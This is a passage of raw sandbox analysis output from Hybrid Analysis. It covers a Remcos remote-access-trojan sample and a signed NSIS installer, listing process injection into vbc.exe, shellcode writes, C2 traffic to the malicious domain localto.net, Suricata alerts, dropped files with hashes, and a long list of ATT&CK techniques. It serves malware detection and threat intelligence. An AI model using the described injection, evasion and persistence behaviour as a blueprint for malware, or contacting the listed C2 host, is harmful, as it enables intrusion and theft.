506001800000058d5060040000000000000000000000000800500f40400000000000000000000000000000000000000000000000000002e746578740000002d610500001000000062050000040000000000000000000000000000200000602e72646174610000108b010000800500008c010000660500000000000000000000000000400000402e64617461000000945d000000100700000e000000f20600000000000000000000000000400000c02e72737263000000d448000000700700004a000000000700000000000000000000000000400000402e72656c6f6300009c3b000000c00700003c0000004a070000000000000000000000000040000042000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-134", "type": 6, "relevance": 10, "name": "Creates a system process in suspended mode (likely for process injection)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" - (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"vbc.exe\" connects to <IPv4>:2247", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"localto.net\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 2247", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Exploit/Shellcode", "identifier": "stream-38", "type": 1, "relevance": 8, "name": "Writes shellcode to a remote process", "description": "Wrote 2 instructions to a remote process\n Wrote 89 instructions to a remote process\n Wrote 1 instructions to a remote process\n Wrote 112 instructions to a remote process\n Wrote 10 instructions to a remote process\n Wrote 73 instructions to a remote process", "origin": "Hybrid Analysis Technology", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Remcos 3.x Unencrypted Checkin\" (SID: 2032776, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)\n Detected alert \"ET MALWARE Remcos 3.x Unencrypted Server Response\" (SID: 2032777, Rev: 2, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24
https://hybrid-analysis.com/sample/fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24
Hybrid Analysis - Remcos
{"size": 6227120, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive", "submit_name": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24", "sha256": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24", "av_detect": 15, "vx_family": "RiskWare[RemoteAdmin]/NetSup.gen", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE", "issuer": "CN=GlobalSign Code Signing Root R45, O=GlobalSign nv-sa, C=BE", "serial_number": "77bd0e05b7590bb61d4761531e3f75ed", "md5": "E6:EB:41:AD:64:04:31:7A:F8:A1:8B:64:F9:8C:2B:CF", "sha1": "C1:0B:B7:6A:D4:EE:81:52:42:40:6A:1E:3E:11:17:FF:EC:74:3D:4F", "valid_from": "2020-07-28T00:00:00+00:00", "valid_until": "2030-07-28T00:00:00+00:00"}, {"owner": "EMAILADDRESS=<email_address>, CN=MANH THAO NGUYEN COMPANY LIMITED, O=MANH THAO NGUYEN COMPANY LIMITED, STREET=\"Thon Thong, Xa Thanh Tam, Huyen Thanh Liem\", L=Ha Nam, ST=Ha Nam, C=VN, OID.<IPv4>.4.1.311.<IPv4>=Ha Nam, OID.<IPv4>.4.1.311.<IPv4>=VN, SERIALNUMBER=0700863851, OID.<IPv4>=Private Organization", "issuer": "CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE", "serial_number": "27356f6b781b07d6f52ff68f", "md5": "5E:43:E8:E3:9B:6C:C7:FB:25:1F:44:A7:0F:F0:18:01", "sha1": "6E:0A:D8:7D:84:86:46:C9:6C:A2:54:DC:FA:FE:EA:02:0C:BD:4A:1C", "valid_from": "2024-12-05T09:45:18+00:00", "valid_until": "2025-12-06T09:45:18+00:00"}], "is_certificates_valid": true, "total_processes": 3, "total_signatures": 251, "extracted_files": [{"name": "Setup.exe", "file_path": "%TEMP%\\FutureApp\\0\\Setup.exe", "file_size": 5227721, "sha256": "3e8ffa82c91ff76ffa581c2f1bf70fd92fa9dca3f8980706a54f28062dc2de63", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "Sibuia.exe (PID: 2688)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "333.exe", "file_path": "%TEMP%\\FutureApp\\1\\333.exe", "file_size": 331490, "sha256": "0b8c0c908da39e77e0ef2f4b3b0eb96f3709d052252e0eae619790c61fc42b81", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "Ionic.Zip.dll", "file_path": "%TEMP%\\FutureApp\\Ionic.Zip.dll", "file_size": 430464, "sha256": "35d73ec1b3bcdd743c951502aa5ac6bb756e6087311bfc9648587d6c94ca746f", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "Sibjs.exe", "file_path": "%TEMP%\\FutureApp\\Sibjs.exe", "file_size": 2163584, "sha256": "94a297719f304bb12f650d693984db73c7a72685f28cdeeca2fa34a407808231", "type_tags": ["peexe", "executable"], "description": "PE32 executable (console) Intel 80386, for MS Windows", "runtime_process": "Sibuia.exe (PID: 2688)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "Sibuia.exe", "file_path": "%TEMP%\\FutureApp\\Sibuia.exe", "file_size": 2289024, "sha256": "845bb388322c35078cfc9d47d4d1752b62f796f4defa79215004547a040d0704", "type_tags": ["peexe", "executable"], "description": "PE32 executable (console) Intel 80386, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "siblog.dll", "file_path": "%TEMP%\\nsnAAD0.tmp\\siblog.dll", "file_size": 150216, "sha256": "d3289b09fc9c37a80f0215b5c8c7990b9d3353e0c27cc4689e806d6026b6dda7", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "039F3.tmp", "file_path": "%TEMP%\\FutureApp\\039F3.tmp", "file_size": 4608, "sha256": "39858473da9bedf8b5c0ffe9cd4763de4879e877e783fd038af3d93338fa9951", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "039F4.tmp", "file_path": "%TEMP%\\FutureApp\\039F4.tmp", "file_size": 6672, "sha256": "36f86d18c21b93868bf43b3b7d20439d8cf9914c1b557e42f22addd84b4a6f72", "type_tags": ["doc", "office"], "description": "data", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "babka.cmd", "file_path": "%TEMP%\\FutureApp\\2\\babka.cmd", "file_size": 277, "sha256": "70fc159c1040f7da1beaba2ca98004babbd2ae7e2957d7c0c2aa67ebc43a1457", "type_tags": ["text"], "description": "DOS batch file, ASCII text, with CRLF line terminators", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SibClr.dll", "file_path": "%TEMP%\\FutureApp\\SibClr.dll", "file_size": 68480, "sha256": "ffc17acf3f3c8e73b944e279fee7ecaf6fac46ec4c305aedc1c51122db256e37", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "sibjs.exe (PID: 4172)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Zip.dll", "file_path": "%TEMP%\\FutureApp\\Zip.dll", "file_size": 28032, "sha256": "fc66cd9add2a83dd2fb12cd908e8f70d54530d4dbf011e948c8adeaaa1dc975b", "type_tags": ["pedll", "executable"], "description": "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe (PID: 4412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1735)", "10 .C Files compiled with CL.EXE (Visual Studio 6 Processor Pack) (build: 9044)", "15 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 4035)"], "imported_objects": ["2 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 4035)"], "file_analysis": ["File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 165}, "processes": [{"uid": "00000000-00004412", "name": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe", "normalized_path": "C:\\fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24.exe", "sha256": "fa84aaca643d68422484d8c78e900d06102d0fbff57598755e97705bfe419c24", "av_label": "Redcap.xjtlk", "av_matched": 3, "av_total": 22}, {"uid": "00000000-00002688", "parentuid": "00000000-00004412", "name": "Sibuia.exe", "normalized_path": "%TEMP%\\FutureApp\\Sibuia.exe", "command_line": "TRUE 111 0", "sha256": "845bb388322c35078cfc9d47d4d1752b62f796f4defa79215004547a040d0704"}, {"uid": "00000000-00004172", "parentuid": "00000000-00002688", "name": "sibjs.exe", "normalized_path": "%TEMP%\\FutureApp\\sibjs.exe", "command_line": "TRUE 000 False cond_pkg", "sha256": "94a297719f304bb12f650d693984db73c7a72685f28cdeeca2fa34a407808231"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 18}, {"tactic": "Execution", "technique": "PowerShell", "attck_id": "T1059.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/001", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 5, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 5, "informative_identifiers_count": 8}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 2, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 24}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", 